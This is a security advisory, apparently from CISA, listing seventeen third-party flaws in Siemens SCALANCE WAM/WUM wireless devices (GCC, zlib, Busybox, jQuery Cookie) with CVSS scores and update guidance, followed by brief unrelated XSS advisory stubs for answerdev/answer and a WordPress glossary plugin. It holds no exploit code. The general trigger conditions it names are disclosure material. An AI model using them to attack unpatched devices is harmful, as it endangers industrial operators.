Vulnerabilities: Generation of Error Message Containing Sensitive Information, Out-of-bounds Write, NULL Pointer Dereference, Out-of-bounds Read, Improper Input Validation, Release of Invalid Pointer or Reference, Use After Free, Prototype Pollution 
2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to cause a denial-of-service condition or disclose sensitive data. 
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following software from Siemens is affected: 
SCALANCE WAM763-1 (6GK5763-1AL00-7DA0): All versions prior to v2.0 
SCALANCE WAM766-1 (EU) (6GK5766-1GE00-7DA0): All versions prior to v2.0 
SCALANCE WAM766-1 (US) (6GK5766-1GE00-7DB0): All versions prior to v2.0 
SCALANCE WAM766-1 EEC (EU) (6GK5766-1GE00-7TA0): All versions prior to v2.0 
SCALANCE WAM766-1 EEC (US) (6GK5766-1GE00-7TB0): All versions prior to v2.0 
SCALANCE WUM763-1 (6GK5763-1AL00-3DA0): All versions prior to v2.0 
SCALANCE WUM763-1 (6GK5763-1AL00-3AA0): All versions prior to v2.0 
SCALANCE WUM766-1 (EU) (6GK5766-1GE00-3DA0): All versions prior to v2.0 
SCALANCE WUM766-1 (US) (6GK5766-1GE00-3DB0): All versions prior to v2.0 
3.2 VULNERABILITY OVERVIEW
3.2.1 GENERATION OF ERROR MESSAGE CONTAINING SENSITIVE INFORMATION CWE-209 
Stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, fstack-protector-strong, and fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against. 
CVE-2018-12886 has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). 
3.2.2 OUT-OF-BOUNDS WRITE CWE-787 
Zlib versions before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. 
CVE-2018-25032 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). 
3.2.3 NULL POINTER DEREFERENCE CWE-476 
A NULL pointer dereference in Busybox's man applet leads to a denial-of-service condition when a section name is supplied but no page argument is given. 
CVE-2021-42373 has been assigned to this vulnerability. A CVSS v3 base score of 5.1 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H). 
3.2.4 OUT-OF-BOUNDS READ CWE-125 
An out-of-bounds heap read in Busybox's unlzma applet leads to an information leak and a denial-of-service condition when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that internally supports LZMA compression. 
CVE-2021-42374 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H). 
3.2.5 IMPROPER INPUT VALIDATION CWE-20 
An incorrect handling of a special element in Busybox's ash applet leads to a denial-of-service condition when processing a crafted shell command, due to the shell mistaking specific characters for reserved characters. This could be used for a denial-of-service attack under rare conditions of filtered command input. 
CVE-2021-42375 has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 
3.2.6 NULL POINTER DEREFERENCE CWE-476 
A NULL pointer dereference in Busybox's hush applet leads to a denial-of-service condition when processing a crafted shell command, due to missing validation after a \x03 delimiter character. This may be used for a denial-of-service attack under very rare conditions of filtered command input. 
CVE-2021-42376 has been assigned to this vulnerability. A CVSS v3 base score of 4.1 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 
3.2.7 RELEASE OF INVALID POINTER OR REFERENCE CWE-763 
An attacker-controlled pointer free in Busybox's hush applet leads to a denial-of-service condition and possible code execution when processing a crafted shell command, due to the shell mishandling the &&& string. This could be used for remote code execution under rare conditions of filtered command input. 
CVE-2021-42377 has been assigned to this vulnerability. A CVSS v3 base score of 6.4 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.8 USE AFTER FREE CWE-416 
A use-after-free in Busybox's awk applet leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the getvar_i function. 
CVE-2021-42378 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.9 USE AFTER FREE CWE-416 
A use-after-free in Busybox's awk applet leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the next_input_file function. 
CVE-2021-42379 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.10 USE AFTER FREE CWE-416 
A use-after-free in awk leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the clrvar function. 
CVE-2021-42380 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.11 USE AFTER FREE CWE-416 
A use-after-free in awk leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the hash_init function. 
CVE-2021-42381 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.12 USE AFTER FREE CWE-416 
A use-after-free in awk leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the getvar_s function. 
CVE-2021-42382 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.13 USE AFTER FREE CWE-416 
A use-after-free in awk leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the evaluate function. 
CVE-2021-42383 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.14 USE AFTER FREE CWE-416 
A use-after-free in Busybox's awk applet leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the handle_special function. 
CVE-2021-42384 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.15 USE AFTER FREE CWE-416 
A use-after-free in awk leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the evaluate function. 
CVE-2021-42385 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.16 USE AFTER FREE CWE-416 
A use-after-free in awk leads to a denial-of-service condition and possibly code execution when processing a crafted awk pattern in the nvalloc function. 
CVE-2021-42386 has been assigned to this vulnerability. A CVSS v3 base score of 6.6 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H). 
3.2.17 IMPROPERLY CONTROLLED MODIFICATION OF OBJECT PROTOTYPE ATTRIBUTES ('PROTOTYPE POLLUTION') CWE-1321 
jQuery Cookie 1.4.1 is affected by prototype pollution, which could lead to DOM cross-site scripting (XSS). 
CVE-2022-23395 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 
3.3 BACKGROUND
CRITICAL INFRASTRUCTURE SECTORS: Multiple Sectors 
COUNTRIES/AREAS DEPLOYED: Worldwide 
COMPANY HEADQUARTERS LOCATION: Germany 
3.4 RESEARCHER
Siemens reported these vulnerabilities to CISA. 
4. MITIGATIONS
Siemens recommends updating the software to v2.0 or later. 
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. To operate the devices in a protected IT environment, Siemens recommends users configure the environment according to Siemens' operational guidelines for Industrial Security and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found on the Siemens webpage for Industrial Security. 
For further inquiries on security vulnerabilities in Siemens products and solutions, users should contact the Siemens ProductCERT. 
For more information, see the associated Siemens security advisory SSA-565386 in HTML and CSAF. 
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploits specifically target these vulnerabilities. These vulnerabilities have a high attack complexity.

Siemens SCALANCE Third-Party

Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.7.

**Answer vulnerable to Stored Cross-site Scripting**

Moderate severity GitHub Reviewed Published Mar 21, 2023 to the GitHub Advisory Database • Updated Mar 21, 2023

GHSA-83qr-c7m9-wmgw: Answer vulnerable to Stored Cross-site Scripting

GHSA-xvfj-84vc-hrmf: Answer vulnerable to Stored Cross-site Scripting

Auth. (contributor+) Cross-Site Scripting vulnerability in TCBarrett WP Glossary plugin <= 3.1.2 versions.

**Solution**

No patched version is available. No reply from the vendor.

thiennv discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Glossary Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

Tag

#xss